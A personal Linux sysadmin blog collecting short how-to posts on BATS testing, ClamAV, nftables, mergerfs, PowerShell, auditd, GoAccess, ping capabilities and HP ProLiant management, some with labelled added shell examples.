April 3, 2020 — 12:31

Author: silver  Category: dev linux  Comments: Off

Bash Automated Testing System

BATS is a framework for unit testing Bash scripts. The latest version can be found here:

Tests make sure that changes to your script don't break existing behaviour, and with BATS you don't have to check this by hand every time.

Bats test files have the ".bats" extension, and can be run like this: bats example.bats.


There are two helper libraries, bats-support and bats-assert, that you'll also want to check out and load at the start of your tests:


An example test case might look like this:

#!/usr/bin/env bats

load 'bats-support/load'
load 'bats-assert-1/load'

# ./script.sh stands in for the script under test (its name is missing from the page)
@test "$(date '+%H:%M:%S') test help" {
  run ./script.sh -h
  [ "$status" -eq 0 ]
  assert_output --partial "USAGE:"
}

@test "$(date '+%H:%M:%S') test invalid argument" {
  run ./script.sh -invalid
  [ "$status" -eq 1 ]
  assert_output --partial 'Error: invalid or unknown arg(s)'
}

Each test name starts with the current time and a short description; the test body then runs the script under test and checks its exit status and output.

The first case passes if -h exits with status 0 and prints "USAGE:" somewhere. Other text before and after is allowed because we assert a partial match.

The second case passes an invalid argument, expects exit status 1 and checks that the output contains 'Error: invalid or unknown arg(s)'.

More testing

If you need more complicated tests there are also functions and variables. setup() runs before each test and teardown() after it, which is where temporary files and fixtures belong.

A good way to test is to be able to source your script and call its functions directly instead of only running the whole script, so it pays to structure the script that way from the start (for example by only calling main when the script is executed, not when it is sourced).
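Here is an added example of a script laid out that way; it is not from the original post, and the script name example.sh, its options and the function names are made up for illustration. A .bats file like the one above can then either `run ./example.sh -h` for an end-to-end check or `source ./example.sh` and call parse_args directly:

```shell
#!/usr/bin/env bash
# Added example (not from the page): a script structured so a .bats file
# can either run it end to end or source it and call its functions.
# example.sh, its options and all function names are illustrative.

usage() {
  echo "USAGE: example.sh [-h] [-n NAME]"
}

# parse_args fills NAME and SHOW_HELP; unknown arguments produce the
# error string the BATS test above looks for and a non-zero return.
parse_args() {
  NAME=""
  SHOW_HELP=0
  while [ $# -gt 0 ]; do
    case "$1" in
      -h)
        SHOW_HELP=1 ;;
      -n)
        [ $# -ge 2 ] || { echo "Error: invalid or unknown arg(s): -n needs a value" >&2; return 1; }
        NAME=$2
        shift ;;
      *)
        echo "Error: invalid or unknown arg(s): $1" >&2
        return 1 ;;
    esac
    shift
  done
  return 0
}

greet() {
  printf 'hello %s\n' "${1:-world}"
}

main() {
  parse_args "$@" || exit 1
  if [ "$SHOW_HELP" = 1 ]; then
    usage
    exit 0
  fi
  greet "$NAME"
}

# Run main only when executed directly. When a .bats file sources this
# script, BASH_SOURCE differs from $0 and main is skipped, so the tests
# can call parse_args/greet in isolation. (Plain sh has no BASH_SOURCE;
# there the script simply runs.)
if [ -z "${BASH_SOURCE:-}" ] || [ "$BASH_SOURCE" = "$0" ]; then
  main "$@"
fi
```

The guard at the bottom is the whole trick: `bats` loads the file as a library, the functions become testable units, and the end-to-end `run ./example.sh ...` tests still work because a direct execution reaches main.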

Alternatively, there are other frameworks available:

December 16, 2019 — 15:14

Author: silver  Category: linux  Comments: Off

ClamAV is a decent anti-virus scanner for Linux. Unfortunately it does not run very well on low-memory systems (<1GB).

Running its database update tool freshclam can trigger the OOM killer. You will notice this when fetching the daily cdiffs keeps failing (see 'dmesg' and the freshclam log under /var/log/clamav). cdiffs only contain the differences since the previous database version; the problem is that applying them to produce a whole cvd takes a lot of memory.

If there's close to enough RAM you could try cgroups (via systemd, if available) or good old ulimit:

Edit /etc/cron.d/clamav-freshclam and replace whats there with:

29 */1 * * *    clamav [ -x /usr/bin/freshclam ] && { ulimit -Sm 512000; ulimit -Sv 512000; ulimit -Hm 1024000; ulimit -Hv 1024000; /usr/bin/freshclam --quiet; } > /dev/null

Note that 'ulimit -m' (RSS) is accepted but not enforced by current Linux kernels; it is the '-v' address-space limit that actually caps freshclam, and if it is set too low freshclam simply fails instead of being OOM-killed.

But what if you’re on an embedded system or small vps and there’s not even close to 1GB memory available?

Simple, just get the full cvd files instead:

29 */1 * * *     clamav { for i in bytecode.cvd daily.cvd main.cvd; do wget -q -N -P /var/lib/clamav "$i"; done; }  > /dev/null

Two things to keep in mind: wget's '-N' (only fetch when the remote file is newer) does nothing when combined with '-O', hence '-P' above so the file keeps its own name and unchanged files are not re-downloaded every hour; and unlike freshclam, wget does not check the database signature itself, so you rely on clamd/clamscan verifying the cvd's built-in signature when they load it.

Password Managers
December 11, 2019 — 15:34

Author: silver  Category: encryption linux windows  Comments: Off

There are basically three categories to choose from, depending on where the service and the database live: local, "cloud"/SaaS, or self-hosted on-premise.

For single-user/home use KeePass is fine, or perhaps even the password manager built into the web browser. A SaaS option such as LastPass adds ease of access, in exchange for trusting a third party with the vault.

For company/enterprise use, sharing passwords with groups/teams should be supported, preferably with an on-premise option.

December 11, 2019 — 14:32

Author: silver  Category: linux network  Comments: Off

nftables (nft) replaces iptables:

  • Debian (10 buster) points 'iptables' at 'iptables-nft' via update-alternatives; the old implementation is still available as 'iptables-legacy'
  • Red Hat uses nft as the preferred firewall since RHEL 8, and firewalld uses nft as its backend

If you haven’t switched yet you might want to ‘translate’ your current iptables rules and make other programs use nft.


rules are located in:

  • Debian /etc/nftables.conf
  • RedHat /etc/sysconfig/nftables.conf


nft list ruleset

nft list chain ip filter INPUT

nft list tables

nft list table ip filter


nft flush ruleset


iptables-restore-translate -f /etc/iptables/rules.v4 > /etc/iptables/ruleset.nft

ip6tables-restore-translate -f /etc/iptables/rules.v6 > /etc/iptables/ruleset6.nft


Oddly enough the only place I could find an nft plugin was here

curl -o /usr/share/netfilter-persistent/plugins.d/15-nft


Make fail2ban (f2b) use nft:

  • edit '/etc/fail2ban/jail.local': banaction = nftables-multiport

  • add to '/etc/nftables.conf': include "/etc/fail2ban.conf"

  • create '/etc/fail2ban.conf':

#!/usr/sbin/nft -f

# Use ip as fail2ban doesn't support ipv6 yet
table ip fail2ban {
        chain input {
                # Assign a high priority to reject as fast as possible and avoid more complex rule evaluation
                type filter hook input priority 100;
        }
}

Two caveats: fail2ban 0.10 and later do handle IPv6, so on a current version the inet family can replace ip; and in nftables a numerically lower priority is evaluated first, so a chain at priority 100 runs after a priority-0 filter chain, not before it (use a negative priority if bans really must be checked first).

September 6, 2019 — 18:36

Author: silver  Category: linux storage  Comments: Off

mergerfs is a union filesystem (FUSE), like unionfs, aufs and mhddfs: it merges multiple paths and mounts them as one, similar to concatenating the drives.

Get it here: or from the OS package repository.

Compared to (older) alternatives mergerfs seems very stable over the past months I've been using it. It offers multiple policies for how to spread the data over the drives in the pool.

Optionally SnapRAID can be used to add parity disk(s) to protect against disk failures.

Create/mount pool

Example using 5 devices /dev/sd[b-f]

Disks are already partitioned and have a fs

for i in {b..f}; do
  mkdir -p /mnt/sd${i}1
  mount /dev/sd${i}1 /mnt/sd${i}1 && \
  mkdir -p /mnt/sd${i}1/mfs
done && \
mkdir -p /mnt/mergerfs && \
# quote the branch glob: mergerfs expands it itself, whereas the shell would
# split it into separate arguments and mergerfs would misread them
mergerfs -o defaults,allow_other,use_ino '/mnt/sd*/mfs' /mnt/mergerfs

And here’s the result from ‘df’:

/dev/mapper/sdb1             3.6T  100M  3.5T  1% /mnt/sdb1
/dev/mapper/sdc1             3.6T  100M  3.5T  1% /mnt/sdc1
/dev/mapper/sdd1             3.6T  100M  3.5T  1% /mnt/sdd1
/dev/mapper/sde1             3.6T  100M  3.5T  1% /mnt/sde1
/dev/mapper/sdf1             3.6T  100M  3.5T  1% /mnt/sdf1
mergerfs                      18T  500M  8.5T  1% /mnt/mergerfs

Changing pool

remove an old drive from the mergerfs pool:

xattr -w user.mergerfs.srcmounts -/mnt/data1 /mnt/pool/.mergerfs

add a new drive:

xattr -w user.mergerfs.srcmounts +/mnt/data4 /mnt/pool/.mergerfs

(newer mergerfs releases renamed this attribute to user.mergerfs.branches; the mergerfs.ctl commands further down wrap the same attribute and hide that detail)

some other mount options (-o)

  • use_ino make mergerfs supply inodes
  • fsname=example-name name in df
  • no_splice_write fixes page errors in syslog

Pool info

xattr -l /mnt/mergerfs/.mergerfs


  • mergerfs.balance
  • mergerfs.consolidate
  • mergerfs.ctl
  • mergerfs.dedup
  • mergerfs.dup
  • mergerfs.fsck
  • mergerfs.mktrash


mergerfs.ctl -m /mnt/mergerfs info
mergerfs.ctl -m /mnt/mergerfs list values
mergerfs.ctl -m /mnt/mergerfs remove path /mnt/data1
mergerfs.ctl -m /mnt/mergerfs add path /mnt/data4

July 9, 2019 — 9:17

Author: silver  Category: dev linux windows  Comments: Off

I’ve been using PS for a while now and I don’t hate it anymore :) In fact I think it’s very usable for lots of tasks and automation.

Some Useful commands:

  • Get-Command *help* or Get-Command -Module PackageManagement
  • Get-Member to view properties e.g. Get-Disk | Get-Member
  • Get-Alias
  • Get-ExecutionPolicy -List
  • Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
  • piping to select, sort and where
  • Invoke-WebRequest $url

CSV, XML and JSON support is included:

  • Import-CSV Export-CSV
  • ConvertTo-XML
  • ConvertFrom-Json ConvertTo-Json

And stuff like:

  • Logging sessions: Start-Transcript Stop-Transcript
  • Viewing Certificates: cd Cert:\ (now you can ‘dir’ etc)
  • Run as admin: powershell.exe -Command "Start-Process cmd -Verb RunAs"
  • PS Linting:

Remote usage is also possible over WinRM (or OpenSSH):

  • Enter-PSSession -ComputerName <host>

Then there’s Loops, Params, Arrays and Hash Tables e.g. foreach, Param([string]$arg), @() and @{}

More info:

Cgroups and NS
May 30, 2019 — 21:18

Author: silver  Category: linux  Comments: Off

Linux Control Groups and Namespaces

Used for limiting and isolation



  • lsns
  • nsenter
  • cgroup-tools pkg (cgget, cgset, …)


  • ip netns list
  • ip netns identify <pid>
  • ip netns exec <netns> ip
  • or the short form: ip -n <netns> <command> (also spelled ip -netns <netns>)


  • ps axwww -o cgroup
  • ps axwww -o cgroup,user,pid,%cpu,%mem,vsz,rss,tname,stat,start,time,comm
  • ps axwww -o ipcns,mntns,netns,pidns,userns,utsns,pid,comm


  • /proc/<pid>/ns
  • /sys/fs/cgroup


Vim linting
May 30, 2019 — 20:50

Author: silver  Category: dev linux  Comments: Off

Linting is checking source code for errors, suspicious constructs and style problems without running it.

For Vim there’s ALE: Asynchronous Lint Engine. It supports multiple tools like cpplint for C/C++, ShellCheck for shell scripts, phan for PHP etc etc.


Get it here:


  • ALELint
  • ALEEnable
  • ALEDisable
  • ALENext
  • ALEPrevious


To use Ctrl+j and Ctrl+k to move between errors:

nmap <silent> <C-k> <Plug>(ale_previous_wrap)
nmap <silent> <C-j> <Plug>(ale_next_wrap)
December 8, 2018 — 17:52

Author: silver  Category: linux  Comments: Off

Zonemaster is an Open source DNS validation tool


Install Perl modules


cpanm File::ShareDir File::Slurp Hash::Merge IO::Socket::INET6 List::MoreUtils Mail::RFC822::Address Module::Find Moose Net::IP Readonly::XS Text::CSV Devel::CheckLib

Zonemaster LDNS and Engine:

cpanm Zonemaster::LDNS
cpanm Zonemaster::Engine


time perl -MZonemaster::Engine -e 'print map {"$_\n"} Zonemaster::Engine->test_module("BASIC", "<domain>")'

Install Perl modules


cpanm MooseX::Getopt Text::Reflow Module::Install

Zonemaster CLI:

cpanm Zonemaster::CLI


zonemaster-cli --test basic <domain>
zonemaster-cli --no-ipv6 --show_level --show_module --progress --level INFO --test Syntax <domain>
GNU find
March 30, 2018 — 14:51

Author: silver  Category: linux windows  Comments: Off

Just a few useful ‘find’ examples


find . -path ./foo -prune -o -name bar -print
find /home \( -path /usr/data -prune -o -path /usr/src \) -prune -o -name foo -print
find . -name Makefile -not -path '*/foo/*'
find . -type d ! -regex '.*/\(foo\|bar\).*'


find . -perm -775
find . -perm /u+w,g+
find . -printf "%m:%f\n"
find . -printf "%m %h/%f\n"|grep -v '^\(644\|755\)'

Print date:

find -type f -printf '%TF %.8TT %p\n'


find.exe . -name *.exe -exec certutil -hashfile {} SHA512 ; >c:\hash.txt
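The -perm and -printf idioms above turned into a small permissions audit, added here as an example that is not from the original post. It builds a throwaway directory with known modes (constructed test data, no real system paths) and lists world-writable files, setuid/setgid files and anything that is not 644/755; run the same functions against /usr or / on a real system. It needs GNU find for -printf.

```shell
#!/bin/sh
# Added example (not from the page): a permissions audit built on the
# find -perm / -printf forms shown above. Requires GNU find.

# make_fixture: create a scratch tree with known modes and print its path
# (constructed test data; the names mean nothing)
make_fixture() {
  d=$(mktemp -d)
  mkdir -p "$d/bin" "$d/tmp"
  chmod 1777 "$d/tmp"                      # sticky dir, like /tmp
  : > "$d/bin/ok";    chmod 0755 "$d/bin/ok"
  : > "$d/bin/suid";  chmod 4755 "$d/bin/suid"
  : > "$d/bin/sgid";  chmod 2755 "$d/bin/sgid"
  : > "$d/tmp/ww";    chmod 0666 "$d/tmp/ww"
  echo "$d"
}

# world_writable <dir>: regular files anyone can modify ("-" = all listed bits set)
world_writable() {
  find "$1" -type f -perm -o+w -printf '%m %p\n' | LC_ALL=C sort
}

# setids <dir>: setuid or setgid files ("/" = any of the listed bits set)
setids() {
  find "$1" -type f -perm /u+s,g+s -printf '%m %p\n' | LC_ALL=C sort
}

# odd_modes <dir>: files whose mode is neither 644 nor 755, the same idea as
# the grep -v above but with the mode first so the filter is unambiguous
odd_modes() {
  find "$1" -type f -printf '%m %p\n' | grep -v '^\(644\|755\) ' | LC_ALL=C sort
}
```

The difference between `-perm -mode` (every listed bit must be set) and `-perm /mode` (any listed bit) is what makes the first two functions work; `-perm mode` without a prefix would demand an exact match and miss a 4755 binary when you ask for u+s.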

Updating CPU Microcode
March 28, 2018 — 12:50

Author: silver  Category: linux windows  Comments: Off


There is a tool from Intel called "BIOS Implementation Test Suite" (BITS) that can do several things including handling microcode:


  • load/update microcode using pkg:
  • load/update intel microcode manually:
    – get latest tgz from intel: see below
    – backup/copy files: /lib/firmware/intel-ucode
    – check kernel config: grep MICROCODE /boot/config-*
    – run iucode_tool:
    /usr/sbin/iucode_tool -tb -lS /lib/firmware/intel-ucode/*
    – update initramfs: update-initramfs -u -k all
  • reloading microcode (late loading on a running system):
    echo 1 > /sys/devices/system/cpu/microcode/reload
    (the cpuid module only provides /dev/cpu/*/cpuid; the loader is the microcode driver, so where that is built as a module the alternative is: rmmod microcode; modprobe microcode)
  • show version:
    dmesg | grep microcode or: grep microcode /proc/cpuinfo
  • skip loading microcode on boot:
    add to the kernel command line in grub: dis_ucode_ldr


Microsoft also ships Intel microcode updates for certain CPUs as Windows updates, for example KB4090007, KB3064209 and KB2970215.

Get Microcode

Download the latest version from Intel:

Magic SysRq Key
November 25, 2017 — 22:19

Author: silver  Category: linux  Comments: Off

How to use the magic SysRq key (Alt + SysRq/Print Screen + <key>).

The classic safe-reboot sequence is "REISUB": R (take the keyboard out of raw mode), E (SIGTERM to all processes), I (SIGKILL to all processes), S (sync), U (remount read-only), B (reboot), with a few seconds between the keys.

Enable it (1 = all functions; kernel.sysrq is actually a bitmask and many distributions ship a restricted default, so check the current value in /proc/sys/kernel/sysrq first):

echo 1 > /proc/sys/kernel/sysrq

To make it permanent add kernel.sysrq = 1 to /etc/sysctl.conf. Anyone with console access can then use every function, so keep it restricted on machines where that matters.

When logged in using SSH, the same functions are accessible by writing the key to /proc/sysrq-trigger:
echo s > /proc/sysrq-trigger

useful options:

  • b: Immediately reboot the system, without unmounting or syncing filesystems
    echo b > /proc/sysrq-trigger
  • e: Send the SIGTERM signal to all processes except init (PID 1)
  • f: Call oom_kill, which kills a process to alleviate an OOM condition:
  • s: Sync all mounted filesystems:
  • t: Output a list of current tasks and their information to the console:
  • u: Remount all mounted filesystems in read-only mode
  • w: Display list of blocked (D state) tasks
  • space: Print a summary of available magic SysRq keys
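Because kernel.sysrq is a bitmask rather than an on/off switch, here is an added example (not from the original post) that decodes a value into the groups of functions it allows, using the bit assignments from the kernel's sysrq documentation. Feed it the contents of /proc/sys/kernel/sysrq to see what a given host permits:

```shell
#!/bin/sh
# Added example (not from the page): decode the kernel.sysrq bitmask.
# Bit values are the ones documented in Documentation/admin-guide/sysrq.rst.
# usage: sysrq_decode <value>   e.g. sysrq_decode "$(cat /proc/sys/kernel/sysrq)"
sysrq_decode() {
  mask=$1
  case "$mask" in
    0) echo "disabled"; return 0 ;;
    1) echo "all functions enabled"; return 0 ;;
  esac
  set -- \
    "2:console loglevel" \
    "4:keyboard (SAK, unraw: k, r)" \
    "8:debug dumps (t, w, ...)" \
    "16:sync (s)" \
    "32:remount read-only (u)" \
    "64:signal processes (e, i, f)" \
    "128:reboot/poweroff (b, o)" \
    "256:nice RT tasks (n)"
  for entry in "$@"; do
    bit=${entry%%:*}
    desc=${entry#*:}
    # print the group if its bit is set in the mask
    if [ $((mask & bit)) -ne 0 ]; then
      echo "$bit $desc"
    fi
  done
  return 0
}
```

A value of 176, a common distribution default, comes out as sync, remount read-only and reboot: enough for an emergency shutdown from the console, but not the process-signalling or debug-dump keys.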

November 25, 2017 — 18:04

Author: silver  Category: linux web  Comments: Off

GoAccess is a “real-time web log analyzer” which can output in CLI or HTML (like webalizer, awstats and piwik etc). It works out of the box with Apache, for lighttpd you probably need to specify the log format. Examples below are for lighttpd. Run “goaccess /var/log/httpd/access.log” without any other arguments and it will ask for the log format and drop you into the Dashboard (text based gui).


no conf, just arguments:

goaccess /var/log/lighttpd/access.log \
--date-format=%d/%b/%Y \
--time-format='%T %z' \
--log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"'


change /etc/goaccess.conf:

date-format %d/%b/%Y:%T %z
log-format %h %v %e [%d] "%r" %s %b "%R" "%u"
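Before (or alongside) loading a log into goaccess, a quick triage of the raw lines is often useful. The added example below is not from the original post: it constructs a few lighttpd-style lines in exactly the log-format above (addresses from the documentation ranges, requests made up) and counts error responses per client and the 404'd paths, which is where scanners show up. The field numbers follow that format: $1 is %h, $7 the request path, $9 the status.

```shell
#!/bin/sh
# Added example (not from the page): quick triage of lighttpd access-log lines
# in the format  %h %v %e [%d:%t] "%r" %s %b "%R" "%u"  as configured above.

# Constructed sample lines (documentation IP ranges, made-up requests).
SAMPLE_LOG='203.0.113.5 example.org - [01/Apr/2020:10:00:01 +0200] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 example.org - [01/Apr/2020:10:00:02 +0200] "GET /wp-login.php HTTP/1.1" 404 321 "-" "python-requests/2.22"
203.0.113.5 example.org - [01/Apr/2020:10:00:03 +0200] "GET /.env HTTP/1.1" 404 321 "-" "python-requests/2.22"
198.51.100.9 example.org - [01/Apr/2020:10:00:04 +0200] "POST /api HTTP/1.1" 500 87 "-" "curl/7.64"
198.51.100.9 example.org - [01/Apr/2020:10:00:05 +0200] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'

# errors_per_client: "<count> <ip>" for every client that got 4xx/5xx responses,
# noisiest first. With this format field 1 is %h and field 9 is %s.
errors_per_client() {
  awk '$9 ~ /^[45][0-9][0-9]$/ { n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# not_found_paths: distinct paths that returned 404 (typical scanner probes)
not_found_paths() {
  awk '$9 == "404" { print $7 }' | LC_ALL=C sort -u
}

# usage: printf '%s\n' "$SAMPLE_LOG" | errors_per_client
#        zcat -f /var/log/lighttpd/access.log* | errors_per_client | head
```

If the field numbers do not line up on your logs, the log-format string is wrong for goaccess too, so this doubles as a cheap check of the configuration before trusting the dashboard.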


Output to “static” html file.

current log:

goaccess /var/log/lighttpd/access.log \
  --date-format=%d/%b/%Y \
  --time-format='%T %z' \
  --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
  --output=/var/www/html/goaccess.html

use all logs:

zcat -f /var/log/lighttpd/access.log*gz | goaccess \
  --date-format=%d/%b/%Y \
  --time-format='%T %z' \
  --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
  --ignore-crawlers \
  --with-output-resolver \
  -e ::1 -e <ip-to-exclude>


The last option is to run it as Server using WebSocket. This allows it to:

  • output realtime HTML: --real-time-html
  • run as daemon: --daemonize
  • use FIFO: --fifo-in= --fifo-out=
  • use HTTPS: --ssl-cert= --ssl-key= --ws-url=wss://url

live log:

goaccess /var/log/lighttpd/access.log \
 --date-format=%d/%b/%Y \
 --time-format='%T %z' \
 --log-format='%h %v %e [%d:%t] "%r" %s %b "%R" "%u"' \
 --output=/var/www/html/goaccess.html \
 --real-time-html \
 --ssl-cert=/etc/ssl/certs/cert.pem \
 --ssl-key=/etc/ssl/private/privkey.pem --ws-url=wss://<your-host>

You should now see a live dashboard. The browser connects to goaccess's WebSocket server on TCP port 7890, so that port has to be reachable from the client, and since the report lists every visitor's address and requests, the HTML should not be world-readable without some access control in the web server.

August 23, 2017 — 16:45

Author: silver  Category: linux  Comments: Off

perf – performance analysis tools for Linux

Start with:

perf top
perf bench all


To find out why “kworker” process (kernel per-cpu threads) has high CPU usage:

  • record 10 seconds of call graphs (backtraces) on all CPUs to perf.data:
    perf record -g -a sleep 10
  • analyse recording:
    perf report

More info:

August 23, 2017 — 15:37

Author: silver  Category: linux  Comments: Off

Remote upgrade using aptitude:

  1. echo "defscrollback 10000" >>/root/.screenrc
  2. screen
  3. /etc/sysctl.conf:
    # on kernel panic reboot after 60s
    kernel.panic = 60
    # enable magic sysrq key
    kernel.sysrq = 1
  4. In /etc/apt/sources.list: change old to new dist (or “stable” etc)
    ( if needed: apt-get install debian-archive-keyring )
  5. aptitude update
  6. aptitude safe-upgrade
    ( optionally/if needed: full-upgrade, dist-upgrade )

Change default editor:

sudo update-alternatives --config editor

Install build tools:

apt-get install build-essential

pkg install dates:

for file_list in $(ls -rt /var/lib/dpkg/info/*.list); do
  stat_result=$(stat --format=%y "$file_list")
  printf "%-50s %s\n" "$(basename "$file_list" .list)" "$stat_result"
done


apt-get -t stretch-backports install "package"
aptitude -t stretch-backports install "package"

Pinning, in /etc/apt/preferences (or a file under /etc/apt/preferences.d/):

Package: *
Pin: release a=stable
Pin-Priority: 900

Package: *
Pin: release o=Debian
Pin-Priority: -10

“testing” packages:

install a pkg from testing:
sudo apt-get -t testing install tmux
show all testing pkgs:
aptitude search -F "%p %V %v" '?narrow(~i, ~Atesting)'
( stable, unstable, oldstable, etc )

apt-get install package=version

March 4, 2017 — 16:01

Author: silver  Category: linux  Comments: Off

When trying to ping as non root user you might get the following error:

ping: icmp open socket: Operation not permitted

There are several ways to fix this:

reinstall pkg (debian):

$ sudo apt-get install --reinstall iputils-ping

(sets cap)

manually set cap:

$ sudo setcap cap_net_raw+ep /bin/ping
$ sudo setcap cap_net_raw+ep /bin/ping6
$ sudo getcap /bin/ping
$ sudo getcap /bin/ping6

needs kernel support (3.0 or later):

Don't use SOCK_RAW at all: ping can use an unprivileged ICMP datagram socket (IPPROTO_ICMP, SOCK_DGRAM) when the user's group falls inside net.ipv4.ping_group_range:

$ cat /proc/sys/net/ipv4/ping_group_range
$ sysctl net.ipv4.ping_group_range
  • "1 0" default, nobody except root
  • "100 100" single group
  • "0 2147483647" everyone (max gid)
$ sysctl -w net.ipv4.ping_group_range="0 2147483647"

permanent, in /etc/sysctl.conf:

net.ipv4.ping_group_range=0 2147483647

And the option to avoid, setuid root (the whole binary then runs as root, whereas the file capability grants it CAP_NET_RAW only and the ping_group_range approach needs no privilege on the binary at all):

chmod u+s /bin/ping
chmod u+s /bin/ping6
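To see which of the three mechanisms a given host relies on, here is an added example (not from the original post); the function names are mine, and the path to ping and the group id are inputs. It checks them from least to most privilege: ping_group_range (nothing on the binary), a cap_net_raw file capability, then a setuid bit.

```shell
#!/bin/sh
# Added example (not from the page): which mechanism lets this user ping?
# Checked from least to most privilege. Function names are illustrative.

# in_ping_group_range <gid> ["<low> <high>"]: true if gid is inside the range
# (defaults to the running kernel's net.ipv4.ping_group_range)
in_ping_group_range() {
  gid=$1
  range=${2:-$(cat /proc/sys/net/ipv4/ping_group_range 2>/dev/null)}
  set -- $range                       # split "low high" into $1 $2
  [ $# -eq 2 ] || return 1
  [ "$gid" -ge "$1" ] && [ "$gid" -le "$2" ]
}

# ping_priv_source <path-to-ping> [gid]: name the mechanism in effect
ping_priv_source() {
  bin=$1
  gid=${2:-$(id -g)}
  if in_ping_group_range "$gid"; then
    echo "ping_group_range: unprivileged ICMP datagram socket, no privilege on $bin"
  elif command -v getcap >/dev/null 2>&1 && getcap "$bin" 2>/dev/null | grep -q cap_net_raw; then
    echo "file capability: $bin carries cap_net_raw only"
  elif [ -u "$bin" ]; then
    echo "setuid root: all of $bin runs as root (prefer one of the above)"
  else
    echo "none: ping will fail for unprivileged users"
  fi
}

# usage: ping_priv_source "$(command -v ping)"
```

The default range "1 0" is deliberately empty (low above high), which is why the first check fails on a stock system and the binary's own privilege decides.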
Linux Audit
March 4, 2017 — 15:43

Author: silver  Category: linux  Comments: Off

First make sure “auditd” is started

add rules:

auditctl -a always,exit -S all -F path=/etc/passwd -F key=config1
auditctl -w /etc/passwd -p rwa -k config2

del rules:

auditctl -d always,exit -S all -F path=/etc/passwd -F key=config1
auditctl -W /etc/passwd -p rwa -k config2

(or restart auditd)

make permanent:

add rules to /etc/audit/rules.d/audit.rules

show results:

ausearch -ts today -k config1
aureport -k
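ausearch and aureport already do the correlation, but it helps to know what the raw records look like. The added example below is not from the original post: it parses constructed audit.log lines for the config2 watch above. A SYSCALL record says who did it (auid is the login user even after sudo, uid the effective user) and whether it succeeded; the PATH record with the same serial number says which file, and the awk joins the two on that serial. Event serials, PIDs and inode numbers are made up.

```shell
#!/bin/sh
# Added example (not from the page): join raw auditd SYSCALL and PATH records
# by event serial, for rules keyed like the /etc/passwd watch above.

# Constructed sample records (timestamps, pids, inodes made up):
# event 456: root reads /etc/passwd; event 457: uid 1001 fails to open it for writing
AUDIT_SAMPLE='type=SYSCALL msg=audit(1583000000.123:456): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=55d0c1a2b3c0 a2=0 a3=0 items=1 ppid=1200 pid=1234 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="cat" exe="/bin/cat" key="config2"
type=CWD msg=audit(1583000000.123:456): cwd="/root"
type=PATH msg=audit(1583000000.123:456): item=0 name="/etc/passwd" inode=1048600 dev=fd:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=SYSCALL msg=audit(1583000010.500:457): arch=c000003e syscall=257 success=no exit=-13 a0=ffffff9c a1=7ffd1c0 a2=241 a3=1b6 items=1 ppid=2200 pid=2234 auid=1001 uid=1001 gid=1001 euid=1001 suid=1001 fsuid=1001 egid=1001 sgid=1001 fsgid=1001 tty=pts1 ses=5 comm="vi" exe="/usr/bin/vi" key="config2"
type=PATH msg=audit(1583000010.500:457): item=0 name="/etc/passwd" inode=1048600 dev=fd:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL'

# audit_summary: one line per event, sorted by serial:
#   <serial> auid=.. uid=.. comm=.. success=.. key=.. path=..
audit_summary() {
  awk '
    { gsub(/"/, "") }                          # values are quoted; drop the quotes
    { split($2, p, ":"); id = p[2]; sub(/\)/, "", id) }   # msg=audit(TIME:SERIAL): -> SERIAL
    $1 == "type=SYSCALL" {
      seen[id] = 1
      for (i = 3; i <= NF; i++) { split($i, kv, "="); f[id, kv[1]] = kv[2] }
    }
    $1 == "type=PATH" {
      for (i = 3; i <= NF; i++) if (sub(/^name=/, "", $i)) path[id] = $i
    }
    END {
      for (id in seen)
        printf "%s auid=%s uid=%s comm=%s success=%s key=%s path=%s\n",
               id, f[id,"auid"], f[id,"uid"], f[id,"comm"], f[id,"success"], f[id,"key"], path[id]
    }' | sort -n
}

# audit_failures: only the denied attempts, the ones worth a look first
audit_failures() {
  audit_summary | grep 'success=no'
}

# usage: printf '%s\n' "$AUDIT_SAMPLE" | audit_failures
#        ausearch -k config2 --raw | audit_summary
```

The exit=-13 in the second event is -EACCES: the open() was refused by the kernel, and the audit record still exists because the watch fires on the attempt, not on success. That is the property that makes file watches useful for detection.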

stop audit messages from being duplicated into the systemd journal (auditd still writes /var/log/audit/audit.log; this does not disable auditing):

systemctl mask systemd-journald-audit.socket
HP ProLiant
December 9, 2016 — 21:54

Author: silver  Category: linux other  Comments: Off


  • BIOS: F10
  • HP SSA Smart Storage Administrator / ACU Array Configuration Utility: F5
  • ORCA / Options ROM for Configuring Arrays: Press any key…, F8
  • HP IP: F10
  • Boot Menu: F11

Install HP software:


sh spp -d redhat -r 6.7 -n
sh spp -d redhat -r 6.7
sh spp -d redhat -r 5.10 -n
sh spp -d redhat -r 5.10
sed -i 's/gpgcheck=0/gpgcheck=1/' /etc/yum.repos.d/HP-spp.repo
rpm --import
rpm --import
rpm --import
for i in $( rpm -qa gpg-pubkey* ); do rpm -qi $i |grep -B 8 Hewlett; done
yum install hpacucli
yum install hponcfg

HP Server Management Application and Agents Command Line Interface (clear the Integrated Management Log):

# hpasmcli -s "clear iml"

HP Lights-Out Online Configuration Utility for Linux (runs RIBCL XML against the local iLO):

hponcfg -f Clear_EventLog.xml -i

Clear_EventLog.xml clears the iLO event log. hponcfg talks to iLO over the local host interface and ignores the LOGIN credentials, so the PASSWORD value only has to be present, not correct:

<RIBCL VERSION="2.0">
 <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
  <RIB_INFO MODE="write">
   <CLEAR_EVENTLOG/>
  </RIB_INFO>
 </LOGIN>
</RIBCL>

Commands against the server rather than iLO itself go under SERVER_INFO instead:

<RIBCL VERSION="2.0">
 <LOGIN USER_LOGIN="Administrator" PASSWORD="xxx">
  <SERVER_INFO MODE="write">
   <!-- SERVER_INFO command goes here -->
  </SERVER_INFO>
 </LOGIN>
</RIBCL>

Reset the Administrator password (the dummy LOGIN password is the usual "boguspassword" from HP's examples; the new password sits in clear text in this file, so delete it afterwards):

<RIBCL VERSION="2.0">
